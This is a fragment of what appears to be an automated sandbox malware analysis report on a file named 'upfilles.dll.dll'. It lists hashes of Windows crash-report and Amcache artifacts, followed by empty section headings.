C:\ProgramData\Microsoft\Windows\WER\Temp\WER4656.tmp.dmp	Mini DuMP crash report, 14 streams, Fri May 10 22:04:08 2024, 0x1205a4 type	A837E0375D7983509A56860346CFCC15	F75FAE2A056C6FEF8D8F1D700F3412213DFFFB2D	205CD9270682DC17A83E8D40610371F3ED964DD319E67BDBA4BE1780DF36D02F
C:\ProgramData\Microsoft\Windows\WER\Temp\WER46C4.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	57975B44072D1C9B3E80DB2266217745	A9CF9831C70448BFE57EB598D192F042A2AE3A6D	415AD9CE27C4A61A389B2D2AE85DF89BB06FEFD9971BDB3399CAE445E58B8910
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4704.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	243DA7FD47223239375D054C23BDE13D	01345C28EFD562EEDE44945D9F8B54A30951ABC4	CF4636B318E7DCECACDC72437D290E86C0501BCA90B77EE7585C1C837614D3D3
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	B7B3B5CD7790EDF0686FF777BA5097D3	ED234CE4B519238F46F4AA9519B3C51AFB301F20	221475E4ACF30CBC675FA384CAE2C143B9C04EF7B913D8D65B0052080F31D095

Windows Analysis Report upfilles.dll.dll

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
upfilles.dll.dll

Malware Threat Intel
Provided by